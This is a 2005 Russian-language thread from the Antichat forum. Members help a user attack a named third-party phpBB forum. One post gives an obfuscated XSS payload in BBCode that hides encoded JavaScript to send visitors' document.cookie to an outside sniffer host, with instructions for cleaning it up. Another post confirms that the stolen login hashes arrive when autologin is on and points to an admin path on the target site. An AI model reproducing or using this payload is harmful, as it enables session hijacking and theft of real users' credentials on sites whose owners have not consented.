HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Форум на http://www.redwall.planet.ee/forum/index.php
  #1  
Старый 22.12.2005, 14:43
redwin
Новичок
Регистрация: 20.12.2005
Сообщений: 2
С нами: 10731137

Репутация: 0
По умолчанию Форум на http://www.redwall.planet.ee/forum/index.php

http://www.redwall.planet.ee/forum/index.php
Вроде все проверил. Ничего неполучается.
Движок PHPBB версия 13 кажись если верить докам.
 
Ответить с цитированием

  #2  
Старый 22.12.2005, 15:00
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
С нами: 11151686

Репутация: 112
По умолчанию

И XSS не катит? Извени у меня там нет ака и регатся не хочу...
PHP код:
www.ut
 
Ответить с цитированием

  #3  
Старый 22.12.2005, 16:09
TANZWUT
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
С нами: 10991846

Репутация: 2054


По умолчанию

Цитата:
Сообщение от redwin  
http://www.redwall.planet.ee/forum/index.php
Вроде все проверил. Ничего неполучается.
Движок PHPBB версия 13 кажись если верить докам.
ты помоему разделом ошибся...
__________________
Лучший способ защиты - это нападение!!!
 
Ответить с цитированием

  #4  
Старый 23.12.2005, 17:21
redwin
Новичок
Регистрация: 20.12.2005
Сообщений: 2
С нами: 10731137

Репутация: 0
По умолчанию

Akk redwin
password redwin
xss пробовал.
не появляются в снифере данные.
 
Ответить с цитированием

  #5  
Старый 23.12.2005, 20:45
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами: 10840706

Репутация: 547


По умолчанию

Поставь сюда тот код который ты пихал туда ?
 
Ответить с цитированием

  #6  
Старый 23.12.2005, 22:42
Barsik
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
С нами: 11217926

Репутация: 726
По умолчанию

Этот вроде пашет
Код HTML:
[url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
Удали все плюсы кроме плюса у document.cookie
Кук вылетит на ачатовский снифф
 
Ответить с цитированием

  #7  
Старый 24.12.2005, 01:26
syntacsis
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
С нами: 10782887

Репутация: 43
По умолчанию

Цитата:
Сообщение от redwin  
Akk redwin
password redwin
xss пробовал.
не появляются в снифере данные.
Чего не появляется? Все появляется. И vorishka дал код и Barsik - wj код хсс. Оба работают, приходит хэш. Только при условии автологина естств. Если юзер не юзает "Автоматически входить при каждом посещении", то не придет хэш.

(Хотя это и без меня уже 100 раз говорили.
Так что просьба не прибавлять репутацию )

Вот см. твой форум:
http://redwall.planet.ee/forum/admin...?setmodules=00

ну это тоже все знают...

Последний раз редактировалось syntacsis; 24.12.2005 в 02:31..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как забаненному зайти на форум? Хрюк Болталка 16 27.10.2007 17:42
как установить форум vBulletin ? petrovich-lamer PHP 14 10.06.2005 03:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.